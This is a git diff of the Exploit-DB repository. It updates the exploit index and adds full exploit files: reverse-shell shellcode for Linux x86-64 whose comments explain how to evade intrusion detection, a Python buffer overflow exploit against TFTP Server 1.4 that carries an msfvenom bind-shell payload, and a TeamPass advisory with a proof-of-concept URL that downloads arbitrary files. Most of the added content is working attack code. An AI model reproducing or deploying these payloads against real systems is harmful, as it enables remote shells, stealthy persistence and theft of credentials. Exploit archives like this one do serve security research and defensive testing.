-37088,platforms/linux/local/37088.c,"Apport/Ubuntu - Local Root Race Condition",2015-05-23,rebel,linux,local,0
+37088,platforms/linux/local/37088.c,"Apport (Ubuntu 14.04/14.10/15.04) - Local Root Race Condition",2015-05-23,rebel,linux,local,0
 37089,platforms/linux/local/37089.txt,"Fuse 2.9.3-15 - Local Privilege Escalation",2015-05-23,"Tavis Ormandy",linux,local,0
 37090,platforms/php/webapps/37090.txt,"Joomla! JA T3 Framework Component Directory Traversal",2012-04-17,indoushka,php,webapps,0
 37091,platforms/php/webapps/37091.txt,"Acuity CMS 2.6.2 - 'UserName' Parameter Cross Site Scripting",2012-04-17,"Aung Khant",php,webapps,0
@ -36240,7 +36240,7 @@ id,file,description,date,author,platform,type,port
 40045,platforms/php/webapps/40045.txt,"Concrete5 5.7.3.1 - (Application::dispatch) Local File Inclusion",2016-06-29,"Egidio Romano",php,webapps,80
 40092,platforms/php/webapps/40092.txt,"Beauty Parlour & SPA Saloon Management System - Blind SQL Injection",2016-07-11,"Yakir Wizman",php,webapps,80
 40093,platforms/php/webapps/40093.txt,"Clinic Management System - Blind SQL Injection",2016-07-11,"Yakir Wizman",php,webapps,80
-40049,platforms/linux/local/40049.c,"Linux Kernel 4.4.0-2 (Ubuntu 16.04) - netfilter target_offset OOB Local Root Exploit",2016-07-03,vnik,linux,local,0
+40049,platforms/linux/local/40049.c,"Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - netfilter target_offset OOB Local Root Exploit",2016-07-03,vnik,linux,local,0
 40050,platforms/jsp/webapps/40050.txt,"XpoLog Center 6 - Remote Command Execution CSRF",2016-07-04,LiquidWorm,jsp,webapps,30303
 40051,platforms/php/webapps/40051.txt,"Ktools Photostore 4.7.5 - Multiple Vulnerabilities",2016-07-04,"Yakir Wizman",php,webapps,80
 40052,platforms/lin_x86-64/shellcode/40052.c,"Linux/x86-64 - NetCat Bind Shell Shellcode (64 bytes)",2016-07-04,CripSlick,lin_x86-64,shellcode,0
@ -36294,3 +36294,6 @@ id,file,description,date,author,platform,type,port
 40135,platforms/multiple/webapps/40135.txt,"Wowza Streaming Engine 4.5.0 - Multiple XSS",2016-07-20,LiquidWorm,multiple,webapps,8088
 40136,platforms/linux/remote/40136.py,"OpenSSHD <= 7.2p2 - Username Enumeration",2016-07-20,0_o,linux,remote,22
 40137,platforms/php/webapps/40137.html,"WordPress Video Player Plugin 1.5.16 - SQL Injection",2016-07-20,"David Vaartjes",php,webapps,80
+40138,platforms/windows/remote/40138.py,"TFTP Server 1.4 - WRQ Buffer Overflow Exploit (Egghunter)",2016-07-21,"Karn Ganeshen",windows,remote,69
+40139,platforms/lin_x86-64/shellcode/40139.c,"Linux/x86-64 - Subtle Probing Reverse Shell_ Timer_ Burst_ Password_ Multi-Terminal (84_ 122_ 172 bytes)",2016-07-21,CripSlick,lin_x86-64,shellcode,0
+40140,platforms/php/webapps/40140.txt,"TeamPass Passwords Management System 2.1.26 - Arbitrary File Download",2016-07-21,"Hasan Emre Ozer",php,webapps,80
--- a/platforms/lin_x86-64/shellcode/40139.c
+++ b/platforms/lin_x86-64/shellcode/40139.c
@ -0,0 +1,203 @@
+#include <stdio.h>
+#include <string.h>
+//|
+//| Exploit Title: [linux x86_64 Subtle Probing Reverse Shell, Timer, Burst, Password, multi-Terminal (84, 122, 172 bytes)]
+//| Date: [07/20/2016]
+//| Exploit Author: [CripSlick]
+//| Tested on: [Kali 2.0 Linux x86_64]
+//| Version: [No program being used or exploited; I only relied syscalls]
+//|
+//|================================================================================================================
+//|=====================  Why use Cripslick's Subtle Probing Reverse Shell??  =====================================
+//|
+//| 	This is a very big upgrade sense my last probing reverse shell, so if you thought the last
+//| 	one was good for convenience, you will really like this one. The 3 main upgrades are. . .
+//|
+//| 1. 	There is a TIMER (VERY IMPORTANT!!!)
+//|    	This means that you won't be flooding yourself with a thousand probes a second. This is 
+//|    	good because it is less CPU strain on the victim so the victim will less likly know something
+//|    	is up but MUCH more importantly it will more likely bypass the IDS. The last one would be 
+//|    	sure to pop it (have a look at it in WireShark to know what I mean).
+//|
+//| 2. 	The byte count is lower. Upgrades such as not using Push+Pop or inc when moving one byte. 
+//|
+//| 3. 	No Multi-Port because most of you won't be hacking your victim with multiple computers behind
+//|    	a NAT; this helps you because it will lower the byte count. Also note that you will still get
+//|   	a multi-terminal connection (every time your TIMER resets).
+//|
+//| 4. 	You can get a burst of Z probes up front (if you are ready beforehand) and then lower it to
+//|		X probes later, at intervals of Y time so you don't awaken the IDS. Now you will have many claws
+//|		on the victim without waiting hours (if set that long) for your new probes (backups) to come in .
+//|		(A subtle scout makes for a silent killer)
+//|
+//|
+//| 	   NOTE on Daemon: 	If you are using my Daemon C Skeleton, your shellcode will become a daemon
+//|			   				and continue to run until you kill the PIDs or restart the victim's computer.
+//|                 
+//|
+//|	    Why can't you use a timer for the bind shell and keep it to one port?
+//|	    The reason is because the bind shell won't loose the process if you don't connect. Because
+//|	    of that, you would be placing more and more processes on the victim machine until you 
+//|	    would DoS their system. With the reverse shell, the process dies as soon as you don't
+//|	   	answer and that makes this an entirly different animal.
+//|
+//|	   	ps. The bind-shell indentation was skewed for exploit-db. today. For all of you coders here is
+//|		what you should know. exploit-db uses the notpad++ sytel indentation. If you send them a gedit
+//|		formated document your indentation will be off for your comments. 
+//|		If you want a nice indented format of my multi-terminal bind shell plesae go to my website, 
+//|		and thanks for looking.
+//|
+//|================================================================================================================
+//|
+//| ShepherdDowling@gmail.com
+//| OffSec ID: OS-20614
+//| http://50.112.22.183/
+//|
+//| 10.1.1.4	= 	"\x0a\x01\x01\x04"
+
+  #define IPv4 		"\x0a\x01\x01\x04"		    		// in forward-byte-order
+//|
+  #define PORT	 	"\x15\xb5"  			    		// in forward-byte-order
+//|
+  #define PASSWORD	"\x6c\x61\x20\x63\x72\x69\x70\x73"  // in forward-byte-order
+//|					python + 'la crips'[::1].encode('hex')
+//|
+  #define TIMER		"\x02\x01"  	//| in Reverse-Byte-Order
+					//| convert hex to integer (not hex to ascii integer)
+					//| Remmeber to comment out the TIMER sizes below that you are not using
+					//| this example byte size \x10 = 16 seconds while word size \x02\x01 ~ 4 min
+//|
+  #define BURST		"\x05"	//| BURST happens on the first cycle. This is how many probs you will get initially
+//|				//| The BURST happens before the first long timer kicks in (the other is a set sec)
+				//| If I didn't have the sec long timer (in the code) you wouldn't be able to accept
+				//| all the incomming traffic and would loose probs.
+//|
+  #define RESET		"\x01"  //| This applised to CODE3. The idea is to use the reset to stay in control without
+				//| allarming the IDS (Burst to get what you need and then soft hits thereafter)
+				//| example: Burst 5, reset 2, timer 3hrs
+				//| 5 probs (3hrs) 2 probs (3hrs) 2 probs (3hrs) etc. 
+				//| This lets you get 5 terminals off the bat and if you loose connection you won't
+				//| need to wait very long until the next backup probes come your way.
+				//| This lets you connect even after your victim has the reverse shell launched
+				//| The reason for the RESET is not be as aggressive as with the initial BURST.
+				//| You don't want to trip any alarms, so good luck
+
+//|================================================================================================================
+//|****************************************************************************************************************
+//|================================================================================================================
+
+
+//|=====================!!!CHOSE ONLY ONE SHELLCODE!!!=========================
+//| ===========================================================================
+//| CODE1 Single Probe Reverse Shell & no PASSWORD (84 bytes)
+//| ===========================================================================
+//| I'm sure that this is not the shortest reverse shell you have seen but it 
+//| will pass my, "fill all registers test." If you don't know what I mean, 
+//| look below at my C code.
+
+
+unsigned char CODE1[] = //| copy CODE1 and use it below <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
+
+"\x48\x31\xff\x48\xf7\xe7\x48\x31\xf6\xb0\x29\x40\xb7\x02\x40\xb6\x01\x0f\x05\x48\x89"
+"\xc7\x6a\x02\x66\xc7\x44\x24\x02"PORT"\xc7\x44\x24\x04"IPv4"\xb0\x2a\x48\x89\xe6\xb2"
+"\x10\x0f\x05\x6a\x03\x5e\x48\xff\xce\xb0\x21\x0f\x05\x75\xf7\x48\x31\xf6\x48\xf7\xe6"
+"\x56\x48\xb9\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x51\x54\x5f\xb0\x3b\x0f\x05"
+;
+
+
+//|=====================!!!CHOSE ONLY ONE SHELLCODE!!!===========================
+//| =============================================================================
+//| CODE2 Single Probe Reverse Shell with PASSWORD (122 bytes)
+//| =============================================================================
+//| You may think, I know why I want a password on a bind shell but why a revrse
+//| shell? The answer is because you never know who may have access to your 
+//| computer. This is is mainly for safty for that and from probe theft.
+
+
+unsigned char CODE2[] = //| copy CODE2 and use it below <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
+
+"\x48\x31\xff\x48\xf7\xe7\x48\x31\xf6\xb0\x29\x40\xb7\x02\x40\xb6\x01\x0f\x05\x48\x89"
+"\xc7\x6a\x02\x66\xc7\x44\x24\x02"PORT"\xc7\x44\x24\x04"IPv4"\xb0\x2a\x48\x89\xe6\xb2"
+"\x10\x0f\x05\x6a\x03\x5e\x48\xff\xce\xb0\x21\x0f\x05\x75\xf7\x48\x89\xc7\x48\x89\xc6"
+"\x48\x8d\x74\x24\xf0\x6a\x10\x5a\x0f\x05\x48\xb8"PASSWORD"\x48\x8d\x3e\x48\xaf\x74\x05"
+"\x6a\x3c\x58\x0f\x05\x48\x31\xf6\x48\xf7\xe6\x56\x48\xb9\x2f\x2f\x62\x69\x6e\x2f\x73"
+"\x68\x51\x54\x5f\xb0\x3b\x0f\x05"
+;
+
+
+//|=====================!!!CHOSE ONLY ONE SHELLCODE!!!===========================
+//| =============================================================================
+//| CODE3 Subtle Probing Reverse Shell + BURST + TIMER + RESET + Pass (172 bytes)
+//| =============================================================================
+//| You can only use a byte, word (2 bytes) or dword (4byte) timer. It doesn't 
+//| matter what you use but you must comment out what you don't use. In most 
+//| cases you will use the word size going from 4 min to 18 hrs. 
+//| The defaul is \x02\x01 (in reverse byte order) translate = 102 in hex
+//| Thats ~ 4mins in hex (F0 = 4min exact)
+
+
+unsigned char CODE3[] = //| copy CODE3 and use it below <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
+
+
+"\x48\x31\xdb\xb3"BURST"\x48\x31\xff\x48\xf7\xe7\x48\x31\xf6\xb0\x39\x0f\x05\x40\x38"
+"\xf8\x74\x77\x48\x31\xf6\x48\xf7\xe6\xb0\x29\x40\xb7\x02\x40\xb6\x01\x0f\x05\x48\x89"
+"\xc7\x6a\x02\x66\xc7\x44\x24\x02"PORT"\xc7\x44\x24\x04"IPv4"\xb0\x2a\x48\x89\xe6\xb2"
+"\x10\x0f\x05\x6a\x03\x5e\x48\xff\xce\xb0\x21\x0f\x05\x75\xf7\x48\x89\xc7\x48\x89\xc6"
+"\x48\x8d\x74\x24\xf0\x6a\x10\x5a\x0f\x05\x48\xb8"PASSWORD"\x48\x8d\x3e\x48\xaf\x74"
+"\x05\x6a\x3c\x58\x0f\x05\x48\x31\xf6\x48\xf7\xe6\x56\x48\xb9\x2f\x2f\x62\x69\x6e\x2f"
+"\x73\x68\x51\x54\x5f\xb0\x3b\x0f\x05\x48\xff\xcb\x38\xc3\x74\x05\x50\x6a\x01\xeb"
+
+
+//| ATTENTION!!! COMMENT OUT THE TIMERS YOU ARE NOT GOING TO USE
+//| BYTE size Timer
+//	"\x05\xb3"RESET"\x50\x6a"TIMER"\x54\x5f\xb0\x23\x0f\x05\xe9\x5b\xff\xff\xff"
+
+//| WORD Size Timer
+	"\x07\xb3"RESET"\x50\x66\x68"TIMER"\x54\x5f\xb0\x23\x0f\x05\xe9\x59\xff\xff\xff"
+
+//| DWORD Size Timer (It can't go above "\x77\x77\x77\x77")
+//	"\x08\xb3"RESET"\x50\x68"TIMER"\x54\x5f\xb0\x23\x0f\x05\xe9\x58\xff\xff\xff
+
+;
+
+//|================================ VOID SHELLCODE =====================================
+void SHELLCODE()
+{
+//	This part floods the registers to make sure the shellcode will always run
+	__asm__("mov $0xAAAAAAAAAAAAAAAA, %rax\n\t"
+		"mov %rax, %rbx\n\t" "mov %rax, %rcx\n\t" "mov %rax, %rdx\n\t" 
+		"mov %rax, %rsi\n\t" "mov %rax, %rdi\n\t" "mov %rax, %rbp\n\t" 
+		"mov %rax, %r10\n\t" "mov %rax, %r11\n\t" "mov %rax, %r12\n\t" 
+		"mov %rax, %r13\n\t" "mov %rax, %r14\n\t" "mov %rax, %r15\n\t"
+		"call CODE3");  //1st paste CODEX<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
+}
+
+//|================================ VOID printBytes ====================================
+void printBytes()
+{
+	printf("The CripSlick's code is %d Bytes Long\n",
+		strlen(CODE3)); //2nd paste CODEX<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
+}
+
+
+//|================================ Int main ===========================================
+int main ()
+{
+
+
+int pid = fork();  		// fork start
+    if(pid == 0){ 		// pid always starts at 0
+	
+	SHELLCODE();		// launch void SHELLCODE
+						// this is to represent a scenario where you bind to a good program
+						// you always want your shellcode to run first	
+	
+	}else if(pid > 0){	// pid will always be greater than 0 after the 1st process
+						// this argument will always be satisfied
+	
+	printBytes();		// launch printBYTES
+						// pretend that this is the one the victim thinks he is only using
+	}
+return 0;				// satisfy int main
+system("exit");			// keeps our shellcode a daemon
+}
--- a/platforms/linux/local/19250.txt
+++ b/platforms/linux/local/19250.txt
--- a/platforms/linux/local/141.c
+++ b/platforms/linux/local/141.c
@ -1,3 +1,7 @@
+/*
+ *  EDB Note: This will just "test" the vulnerability. A exploit version can be found here ~ https://www.exploit-db.com/exploits/145/
+*/
+
 /*
 *  Proof-of-concept exploit code for do_mremap()
 *
--- a/platforms/linux/local/142.c
+++ b/platforms/linux/local/142.c
@ -1,3 +1,7 @@
+/*
+ *  EDB Note: This will just "test" the vulnerability. A exploit version can be found here ~ https://www.exploit-db.com/exploits/145/
+*/
+
 /* 
 * Proof of concept code for testing do_mremap() Linux kernel bug.
 * It is based on the code by Christophe Devine and Julien Tinnes
--- a/platforms/linux/local/154.c
+++ b/platforms/linux/local/154.c
@ -1,6 +1,10 @@
 /*
 *  Proof-of-concept exploit code for do_mremap() #2
 *
+ * EDB Note: This is NOT to be confused with CVE-2003-0985 // https://www.exploit-db.com/exploits/141/, which would be "do_mremap() #1".
+ * EDB Note: This will just "test" the vulnerability. A exploit version can be found here ~ https://www.exploit-db.com/exploits/160/
+ *
+ *
 *  Copyright (C) 2004  Christophe Devine
 *
 *  This program is free software; you can redistribute it and/or modify
--- a/platforms/linux/local/40049.c
+++ b/platforms/linux/local/40049.c
@ -1,3 +1,7 @@
+/*
+EDB Note: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40053.zip
+*/
+
 --------------------------------------------------- decr.c ---------------------------------------------------
 /**
 * Ubuntu 16.04 local root exploit - netfilter target_offset OOB
--- a/platforms/php/webapps/40140.txt
+++ b/platforms/php/webapps/40140.txt
@ -0,0 +1,66 @@
+1. ADVISORY INFORMATION
+========================================
+Title: TeamPass Passwords Management System via Unauth File Download and Arbitrary File Download
+Application: TeamPass Passwords Management System
+Class: Sensitive Information disclosure
+Remotely Exploitable: Yes
+Versions Affected: TeamPass Passwords Management System <= 2.1.26
+Bugs:  Arbitrary File Download
+Date of found:  21.03.2016
+Reported:  09.05.2016
+Date of Public Advisory: 13.05.2016
+Author: Hasan Emre Ozer 
+
+
+2. CREDIT
+========================================
+This vulnerability was identified during penetration test
+by Hasan Emre Ozer & Halit Alptekin from PRODAFT / INVICTUS
+
+Thank you Mehmet Ince for support
+
+3. DESCRIPTION
+========================================
+We deciced to publish the vulnerability after its fix in release 2.1.26
+
+4. VERSIONS AFFECTED
+========================================
+TeamPass Passwords Management System <= 2.1.10
+
+
+5. TECHNICAL DETAILS & POC
+========================================
+Using 'downloadFile.php' file from 'sources' directory we can download any file.
+
+
+Proof of Concept (POC)
+ 
+Example for downloading database configuration:
+ 
+http://teampass/sources/downloadFile.php?sub=includes&file=settings.php
+
+
+Technical Details
+<?php 
+......
+
+header("Content-disposition: attachment; filename=".rawurldecode($_GET['name']));
+header("Content-Type: application/octet-stream");
+header("Pragma: public");
+header("Cache-Control: must-revalidate, post-check=0, pre-check=0, public");
+header("Expires: 0");
+readfile('../'.$_GET['sub'].'/'.basename($_GET['file']));
+?>
+
+$_GET['sub'] and $_GET['file'] parameters vulnerable in readfile function. 
+
+
+
+6. SOLUTION
+========================================
+Update to the latest version v2.1.26
+
+
+7. REFERENCES
+========================================
+http://teampass.net/2016-05-13-release-2.1.26
--- a/platforms/windows/remote/40138.py
+++ b/platforms/windows/remote/40138.py
@ -0,0 +1,102 @@
+# Exploit Title: [TFTP Server 1.4 - WRQ Buffer Overflow Exploit [Egghunter]]
+# Exploit Author: [Karn Ganeshen]
+# Vendor Homepage: [http://sourceforge.net/projects/tftp-server/]
+# Version: [1.4]
+# Tested on: [Windows Vista SP2]
+#
+# Coded this for Vista Ultimate, Service Pack 2
+# 3-byte overwrite + short jump + Egghunter
+# Standalone mode
+#
+# Couple of overflow exploits already here for this tftp, none for Vista SP2 + Egghunter:
+#     http://www.exploit-db.com/exploits/5314/
+#     http://www.exploit-db.com/exploits/10542/
+#     http://www.exploit-db.com/exploits/5563/
+#     https://www.exploit-db.com/exploits/18345/
+#
+
+#!/usr/bin/python
+
+import socket
+import sys
+
+host = '192.168.49.187'
+port = 69
+
+try:
+s=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
+except:
+print "socket() failed"
+sys.exit(1)
+
+# msfvenom -p windows/shell_bind_tcp LHOST=192.168.49.187 -b \x00 EXITFUNC=seh -f c -e x86/alpha_mixed
+# Payload size: 718 bytes
+
+shellcode = (
+"\x89\xe5\xd9\xcf\xd9\x75\xf4\x5d\x55\x59\x49\x49\x49\x49\x49"
+"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
+"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
+"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
+"\x59\x6c\x48\x68\x4f\x72\x75\x50\x63\x30\x33\x30\x33\x50\x6f"
+"\x79\x59\x75\x35\x61\x6f\x30\x51\x74\x6c\x4b\x42\x70\x46\x50"
+"\x6e\x6b\x62\x72\x66\x6c\x6c\x4b\x73\x62\x56\x74\x6c\x4b\x43"
+"\x42\x45\x78\x66\x6f\x58\x37\x73\x7a\x56\x46\x54\x71\x4b\x4f"
+"\x6e\x4c\x45\x6c\x50\x61\x51\x6c\x33\x32\x74\x6c\x61\x30\x4b"
+"\x71\x68\x4f\x74\x4d\x63\x31\x39\x57\x58\x62\x68\x72\x76\x32"
+"\x71\x47\x4e\x6b\x52\x72\x64\x50\x4c\x4b\x30\x4a\x45\x6c\x6c"
+"\x4b\x30\x4c\x36\x71\x50\x78\x68\x63\x70\x48\x76\x61\x6b\x61"
+"\x43\x61\x4e\x6b\x61\x49\x45\x70\x63\x31\x48\x53\x4c\x4b\x72"
+"\x69\x35\x48\x38\x63\x77\x4a\x77\x39\x6c\x4b\x65\x64\x4c\x4b"
+"\x67\x71\x58\x56\x75\x61\x4b\x4f\x6c\x6c\x69\x51\x7a\x6f\x76"
+"\x6d\x65\x51\x39\x57\x45\x68\x4d\x30\x34\x35\x6a\x56\x45\x53"
+"\x53\x4d\x5a\x58\x47\x4b\x53\x4d\x77\x54\x43\x45\x4d\x34\x73"
+"\x68\x6c\x4b\x61\x48\x57\x54\x46\x61\x6b\x63\x61\x76\x6c\x4b"
+"\x74\x4c\x42\x6b\x4c\x4b\x30\x58\x57\x6c\x75\x51\x79\x43\x4c"
+"\x4b\x33\x34\x6e\x6b\x46\x61\x4e\x30\x4b\x39\x73\x74\x56\x44"
+"\x65\x74\x63\x6b\x43\x6b\x63\x51\x52\x79\x53\x6a\x66\x31\x59"
+"\x6f\x6b\x50\x33\x6f\x33\x6f\x32\x7a\x6e\x6b\x35\x42\x78\x6b"
+"\x4e\x6d\x43\x6d\x62\x48\x37\x43\x46\x52\x37\x70\x35\x50\x61"
+"\x78\x72\x57\x64\x33\x45\x62\x71\x4f\x56\x34\x53\x58\x32\x6c"
+"\x63\x47\x34\x66\x46\x67\x4b\x4f\x6a\x75\x4e\x58\x4e\x70\x43"
+"\x31\x75\x50\x35\x50\x31\x39\x6f\x34\x72\x74\x70\x50\x55\x38"
+"\x56\x49\x4f\x70\x30\x6b\x47\x70\x69\x6f\x48\x55\x71\x7a\x36"
+"\x68\x51\x49\x70\x50\x4a\x42\x4b\x4d\x61\x50\x76\x30\x33\x70"
+"\x36\x30\x35\x38\x69\x7a\x64\x4f\x59\x4f\x6b\x50\x39\x6f\x4b"
+"\x65\x7a\x37\x73\x58\x43\x32\x63\x30\x56\x71\x71\x4c\x6c\x49"
+"\x69\x76\x71\x7a\x64\x50\x53\x66\x72\x77\x73\x58\x4a\x62\x79"
+"\x4b\x50\x37\x65\x37\x39\x6f\x6b\x65\x36\x37\x42\x48\x48\x37"
+"\x4b\x59\x47\x48\x6b\x4f\x39\x6f\x4b\x65\x51\x47\x51\x78\x50"
+"\x74\x5a\x4c\x65\x6b\x79\x71\x69\x6f\x6a\x75\x51\x47\x4f\x67"
+"\x53\x58\x61\x65\x32\x4e\x32\x6d\x70\x61\x49\x6f\x69\x45\x61"
+"\x78\x72\x43\x32\x4d\x30\x64\x43\x30\x4b\x39\x4a\x43\x70\x57"
+"\x53\x67\x72\x77\x64\x71\x48\x76\x31\x7a\x52\x32\x42\x79\x52"
+"\x76\x38\x62\x69\x6d\x65\x36\x4b\x77\x37\x34\x61\x34\x47\x4c"
+"\x57\x71\x45\x51\x6c\x4d\x77\x34\x44\x64\x72\x30\x78\x46\x53"
+"\x30\x67\x34\x33\x64\x32\x70\x70\x56\x73\x66\x42\x76\x62\x66"
+"\x46\x36\x30\x4e\x63\x66\x46\x36\x42\x73\x62\x76\x52\x48\x71"
+"\x69\x38\x4c\x35\x6f\x6e\x66\x79\x6f\x49\x45\x4c\x49\x4b\x50"
+"\x52\x6e\x43\x66\x30\x46\x59\x6f\x54\x70\x62\x48\x34\x48\x6c"
+"\x47\x35\x4d\x55\x30\x39\x6f\x38\x55\x4f\x4b\x59\x6e\x34\x4e"
+"\x76\x52\x59\x7a\x73\x58\x6d\x76\x6c\x55\x4d\x6d\x4d\x4d\x4b"
+"\x4f\x6e\x35\x47\x4c\x63\x36\x71\x6c\x45\x5a\x4f\x70\x49\x6b"
+"\x59\x70\x74\x35\x76\x65\x4d\x6b\x50\x47\x32\x33\x32\x52\x30"
+"\x6f\x62\x4a\x45\x50\x66\x33\x69\x6f\x4e\x35\x41\x41")
+
+# PPR - 0x0040CC22 - in TFTPServerSP.exe
+# 3-byte overwrite
+
+jump_one = "\xEB\xDB\x90\x90" # negative jump back
+egghunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a" #WOOT
+"\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
+"\xef\xb8\x54\x30\x30\x57\x8b\xfa"
+"\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
+
+filename = "\x90"*734 + "T00WT00W" + shellcode + "\x90"*10 + egghunter + "\x90"*10 + jump_one + "\x22\xCC\x40"
+
+mode = "netascii"
+
+evil = "\x00\x02" + filename + "\x00" + mode + "\x00"
+
+print "[*] Sending evil packet, ph33r"
+s.sendto(evil, (host, port))
+print "[*] Check port 4444 for bindshell"